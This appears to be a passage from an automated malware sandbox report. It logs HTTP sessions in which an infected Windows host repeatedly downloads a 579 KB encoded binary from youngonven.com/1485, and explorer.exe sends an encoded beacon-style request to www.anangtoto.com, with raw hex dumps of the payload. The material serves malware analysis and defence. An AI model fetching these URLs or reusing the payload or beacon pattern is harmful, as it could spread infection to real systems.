Oct 8, 2024 11:31:34.338577032 CEST	1236	IN	Data Raw: 2a 36 4b 3a 43 3f 2f 30 41 32 ff 48 ef 46 48 f6 4a 4a f7 ef 3f f4 41 ef 3f f4 ee 2c 27 27 d5 27 d6 25 29 1d 22 cf 24 cd cf 2a 03 ec e9 e4 e9 2b f7 02 e5 dd 10 e3 11 e4 14 0e 12 46 fc f7 f5 48 4b 4c 42 f3 ed f0 41 42 f3 44 3f 05 36 2d 0a 34 34 37 Data Ascii: 6K:C?/0A2HFHJJ?A?,'''%)"$+FHKLBABD?6-4475/.g]]ibbYZZ\TSXNTMTQ}~~z\|u{\|sxwwppyZW\TNRRkkhf{mqo,)'
Oct 8, 2024 11:31:34.338589907 CEST	1236	IN	Data Raw: ad af 80 b0 ad b0 b4 e9 ea 17 e8 e8 e6 e7 e8 e4 e0 13 0d 11 13 ea e9 2c 27 dc d6 2c d8 dc dc 21 cf d1 22 1f cf ce d9 0b 0c 3b fe 07 36 0a 08 fd 07 02 fd 00 30 32 fe 4b 45 ed f5 47 f8 47 f7 ed f2 42 40 f3 f3 3f ee db dc 27 2a 23 2c db 26 22 1f ce Data Ascii: ,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;03`]lh_gb`c\\\ZQUTPTyspsosYXRRlhi]av\|qn
Oct 8, 2024 11:31:34.338603973 CEST	1236	IN	Data Raw: 9f a0 a0 6c 9b 66 98 96 67 96 66 5d 92 96 61 60 9b 6c 5d 80 79 7a 74 ae c5 c6 c7 74 6e c4 6f c4 6f c9 c0 b7 85 8a 87 ba b4 87 bc 84 ae 81 b1 bb 7f 86 89 2b 2c 1a 28 ce 11 16 21 12 13 1b db 0d df ea 0d d0 25 d6 d8 d9 dc d6 2b d4 1d 22 d2 d1 db cd Data Ascii: lfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!FJEFCE=C=KC;5-71783/4.2jc]c_bd^V\NNV[TQNS[V}yxrmnqqq
Oct 8, 2024 11:31:34.338618994 CEST	1236	IN	Data Raw: bb 87 88 b7 b9 87 82 83 7e 7d b1 82 8c 7f 80 7b 70 c6 6e ca 7a 7c c9 c0 c4 75 c0 72 c1 c4 71 58 85 69 68 54 4e 58 aa a4 52 a2 51 51 a3 54 9d 65 6c 8e 97 6a 98 96 8b 67 5f 4f 95 64 8f 94 93 7b c5 c5 7c 7a c8 c8 cc bf c7 c3 be c4 6f bf c3 b5 b8 88 Data Ascii: ~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !5.1LJB H-%&&%"!*FIGJL@B75;1184.-iihf]_dYXY
Oct 8, 2024 11:31:34.338634968 CEST	1236	IN	Data Raw: 3b 3a 05 37 04 33 31 33 31 2d 31 95 6a 6c 68 66 68 95 98 94 5e 93 5d 63 60 92 91 a5 59 57 5b a7 57 ab a8 a0 4d 4f a2 54 a0 50 9e b9 ba 7e 7d 85 b6 87 82 81 b3 b3 85 80 ae af b3 cc 77 77 c7 7a 76 71 c9 be 6e 6e c0 6f c1 be be a5 aa a9 a5 a5 59 5b Data Ascii: ;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut'+($#68LKF@D>'#IFJH
Oct 8, 2024 11:31:34.343744993 CEST	1236	IN	Data Raw: cf 26 d1 1f 2c d4 24 15 10 ea ec e7 14 1b ec 0d 10 e0 df df 0d e3 de 4a 45 4a 4b f9 f6 fb 41 ee 40 43 44 f2 f2 41 3d 39 2f 07 0a 36 0a 07 0c 2f 33 2d df e6 e6 e7 dd b6 cc 67 67 98 97 9b 99 60 60 93 90 5e 8e 93 60 56 50 a8 57 ac a9 aa 56 9d a2 4e Data Ascii: &,$JEJKA@CDA=9/6/3-gg``^`VPWVNSPT}yts\|tvVilZd\OVXMUU^c]hec]b^yv\|\|pquyy]#J!%&+ "$;9::54=:6CJ:LC?

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	49999	63.250.38.167	80

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:42.743499041 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:31:43.704097033 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:31:43 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:31:43.704111099 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:31:43.704123020 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:31:43.704204082 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:31:43.704214096 CEST	1236	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
Oct 8, 2024 11:31:43.704222918 CEST	1236	IN	Data Raw: 2a 36 4b 3a 43 3f 2f 30 41 32 ff 48 ef 46 48 f6 4a 4a f7 ef 3f f4 41 ef 3f f4 ee 2c 27 27 d5 27 d6 25 29 1d 22 cf 24 cd cf 2a 03 ec e9 e4 e9 2b f7 02 e5 dd 10 e3 11 e4 14 0e 12 46 fc f7 f5 48 4b 4c 42 f3 ed f0 41 42 f3 44 3f 05 36 2d 0a 34 34 37 Data Ascii: 6K:C?/0A2HFHJJ?A?,'''%)"$+FHKLBABD?6-4475/.g]]ibbYZZ\TSXNTMTQ}~~z\|u{\|sxwwppyZW\TNRRkkhf{mqo,)'
Oct 8, 2024 11:31:43.704236031 CEST	1236	IN	Data Raw: ad af 80 b0 ad b0 b4 e9 ea 17 e8 e8 e6 e7 e8 e4 e0 13 0d 11 13 ea e9 2c 27 dc d6 2c d8 dc dc 21 cf d1 22 1f cf ce d9 0b 0c 3b fe 07 36 0a 08 fd 07 02 fd 00 30 32 fe 4b 45 ed f5 47 f8 47 f7 ed f2 42 40 f3 f3 3f ee db dc 27 2a 23 2c db 26 22 1f ce Data Ascii: ,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;03`]lh_gb`c\\\ZQUTPTyspsosYXRRlhi]av\|qn
Oct 8, 2024 11:31:43.704247952 CEST	1236	IN	Data Raw: 9f a0 a0 6c 9b 66 98 96 67 96 66 5d 92 96 61 60 9b 6c 5d 80 79 7a 74 ae c5 c6 c7 74 6e c4 6f c4 6f c9 c0 b7 85 8a 87 ba b4 87 bc 84 ae 81 b1 bb 7f 86 89 2b 2c 1a 28 ce 11 16 21 12 13 1b db 0d df ea 0d d0 25 d6 d8 d9 dc d6 2b d4 1d 22 d2 d1 db cd Data Ascii: lfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!FJEFCE=C=KC;5-71783/4.2jc]c_bd^V\NNV[TQNS[V}yxrmnqqq
Oct 8, 2024 11:31:43.704257011 CEST	1236	IN	Data Raw: bb 87 88 b7 b9 87 82 83 7e 7d b1 82 8c 7f 80 7b 70 c6 6e ca 7a 7c c9 c0 c4 75 c0 72 c1 c4 71 58 85 69 68 54 4e 58 aa a4 52 a2 51 51 a3 54 9d 65 6c 8e 97 6a 98 96 8b 67 5f 4f 95 64 8f 94 93 7b c5 c5 7c 7a c8 c8 cc bf c7 c3 be c4 6f bf c3 b5 b8 88 Data Ascii: ~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !5.1LJB H-%&&%"!*FIGJL@B75;1184.-iihf]_dYXY
Oct 8, 2024 11:31:43.704267979 CEST	1236	IN	Data Raw: 3b 3a 05 37 04 33 31 33 31 2d 31 95 6a 6c 68 66 68 95 98 94 5e 93 5d 63 60 92 91 a5 59 57 5b a7 57 ab a8 a0 4d 4f a2 54 a0 50 9e b9 ba 7e 7d 85 b6 87 82 81 b3 b3 85 80 ae af b3 cc 77 77 c7 7a 76 71 c9 be 6e 6e c0 6f c1 be be a5 aa a9 a5 a5 59 5b Data Ascii: ;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut'+($#68LKF@D>'#IFJH
Oct 8, 2024 11:31:43.704277992 CEST	1236	IN	Data Raw: cf 26 d1 1f 2c d4 24 15 10 ea ec e7 14 1b ec 0d 10 e0 df df 0d e3 de 4a 45 4a 4b f9 f6 fb 41 ee 40 43 44 f2 f2 41 3d 39 2f 07 0a 36 0a 07 0c 2f 33 2d df e6 e6 e7 dd b6 cc 67 67 98 97 9b 99 60 60 93 90 5e 8e 93 60 56 50 a8 57 ac a9 aa 56 9d a2 4e Data Ascii: &,$JEJKA@CDA=9/6/3-gg``^`VPWVNSPT}yts\|tvVilZd\OVXMUU^c]hec]b^yv\|\|pquyy]#J!%&+ "$;9::54=:6CJ:LC?
Oct 8, 2024 11:31:43.704333067 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:31:43 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50000	91.195.240.19	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:45.531542063 CEST	173	OUT	GET /btrd/?orD=sqRP0a8aV68K6FqJqAk+hHqxgWstkLnSX2TzjpZXqgEq2vKFORbsNIdmsOuhVtdKxSDXL4nXjg==&8pn=ChvLWF0pZdjL9 HTTP/1.1 Host: www.anangtoto.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	50001	63.250.38.167	80

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:50.689831018 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:31:51.295573950 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:31:51 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:31:51.295593977 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:31:51.295608997 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:31:51.295618057 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:31:51.295624971 CEST	1236	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
Oct 8, 2024 11:31:51.295635939 CEST	1120	IN	Data Raw: 2a 36 4b 3a 43 3f 2f 30 41 32 ff 48 ef 46 48 f6 4a 4a f7 ef 3f f4 41 ef 3f f4 ee 2c 27 27 d5 27 d6 25 29 1d 22 cf 24 cd cf 2a 03 ec e9 e4 e9 2b f7 02 e5 dd 10 e3 11 e4 14 0e 12 46 fc f7 f5 48 4b 4c 42 f3 ed f0 41 42 f3 44 3f 05 36 2d 0a 34 34 37 Data Ascii: 6K:C?/0A2HFHJJ?A?,'''%)"$+FHKLBABD?6-4475/.g]]ibbYZZ\TSXNTMTQ}~~z\|u{\|sxwwppyZW\TNRRkkhf{mqo,)'
Oct 8, 2024 11:31:51.295650005 CEST	1236	IN	Data Raw: 67 97 62 93 62 64 91 60 6b 5e 63 56 a5 5b 58 55 56 57 a8 58 a4 a3 51 9d 52 4f 53 80 b5 7e ba bc b6 b7 b9 81 7d b1 81 af af 84 89 6f cb 27 05 73 c7 c7 71 c3 c3 be 75 bf c3 70 71 5b a7 9d 5c 57 59 a8 a8 9d 53 a5 a1 a1 ab a2 a9 9a 98 9c 97 9a 67 91 Data Ascii: gbbd`k^cV[XUVWXQROS~}o'squpq[\WYSge]d^uyqq,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;
Oct 8, 2024 11:31:51.295660973 CEST	1236	IN	Data Raw: df cd e5 25 df e6 e9 0b 0c fa 08 2d f3 f0 fc 44 ed 44 ed 4c 3e f3 3d 06 0b 09 39 3c 07 07 31 37 33 2d 01 3c 2f 3a 06 98 a5 a9 6b 9c 63 96 62 91 5f 65 a2 9f 98 8f 63 a5 55 59 4d 5c 5c 5b ab 53 a4 4e a4 5b 50 51 5a 8b ba b7 7d b8 b7 8a 89 84 7d 7e Data Ascii: %-DDL>=9<173-</:kcb_ecUYM\\[SN[PQZ}}~}vmzv{zqpmppPliYi[Slfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!
Oct 8, 2024 11:31:51.295672894 CEST	1236	IN	Data Raw: 2e 2f 30 fa 46 49 fa fa 48 f8 fa 3e f8 ef ee f4 f2 f4 ee 2c 2a 2c 1e 24 11 0e 10 d4 f3 d1 1f 23 2c 1f d3 e8 16 ea ea 15 1a 15 15 10 e4 0e 13 dd 0f 10 de fb 4c 46 4b f8 43 4a 42 40 3d 3f f0 f2 4b 3e 40 39 0a 45 1d 21 1f 3c 37 04 33 02 ff 01 33 04 Data Ascii: ./0FIH>,*,$#,LFKCJB@=?K>@9E!<733-_]kik]ad^b[W[T\XST~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !
Oct 8, 2024 11:31:51.295684099 CEST	1236	IN	Data Raw: e7 de e6 e3 ea e8 e8 df e2 e5 14 e2 12 dd e2 2b 27 ce 29 d7 26 dc 2c d2 cd d6 d3 1d 1f 27 11 4c 3b 4a 39 37 fc 44 0a 4c 02 06 ff 03 2f 2d 04 f5 47 f6 f8 49 47 f1 f5 ed f0 f4 ef 42 fb f2 f2 d6 06 fa f7 05 1c e4 2a ec d3 1f 1d 1d 20 1d d3 1b 19 1b Data Ascii: +')&,'L;J97DL/-GIGB* ?JJECLE=@D;5:;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut
Oct 8, 2024 11:31:51.300642967 CEST	1236	IN	Data Raw: 68 59 92 93 5e 91 93 8f 8d 94 92 c6 77 76 78 cb c9 c7 c1 c8 bf c6 71 72 cc bd 55 58 5c 59 ae 8a bb b9 bc b1 b8 b5 7f 82 af 7d 7d e9 1b 18 e6 e6 ec 15 eb e7 e8 e2 e6 e2 e0 0f df d5 da 2b 27 28 28 d1 d1 23 d4 d2 cf 1d d4 1d d4 3c 07 09 0c 0a 0b 3c Data Ascii: hY^wvxqrUX\Y}}+'((#<<54HK=B?)'#(*&,$JEJKA@CDA=9/6/3-gg``^`VPWVNSPT}yts\|tvVil

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	50002	63.250.38.167	80

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:32:03.792558908 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:32:04.402636051 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:32:04 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:32:04.402657032 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:32:04.402667999 CEST	448	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:32:04.402681112 CEST	1236	IN	Data Raw: 48 ee 45 41 f2 49 3d f3 66 97 68 c7 6a ca 6c 91 5e c0 60 bf 62 95 64 cd c7 a2 38 09 3a 0c 66 91 5f 61 64 61 91 63 64 a5 57 4e 5a a5 59 51 a6 4d 9e 56 55 5b 53 59 50 b9 80 89 85 87 86 87 88 84 81 83 ad b2 b2 7d 93 6d 94 95 b8 be c5 bb c9 cc 80 a3 Data Ascii: HEAI=fhjl^`bd8:f_adacdWNZYQMVU[SYP}m`USMQQjie^]`w\|mrs%,$ :559430G;68CECD(,%'%"#))
Oct 8, 2024 11:32:04.402693033 CEST	1236	IN	Data Raw: 40 f1 fa 25 d6 1d da d5 28 d7 28 ce d2 1d cf cf 1e d3 20 1c 17 e9 19 15 e9 e7 11 0f 0e 0d 10 1b 13 10 e1 f9 3f 3e f9 44 f6 f7 46 3f 42 44 46 3d 3f ed 44 3b 3b 0b 35 0a 36 3a 06 01 32 fe 34 32 32 04 fd 68 60 6b 69 6a 64 67 96 62 63 66 91 94 93 8e Data Ascii: @%(( ?>DF?BDF=?D;;56:2422h`kijdgbcfb\VMMXZWRTNNNPymw{womnnrmW\\ZYNMPOTl^{rmt}},)%%!" "7::333.
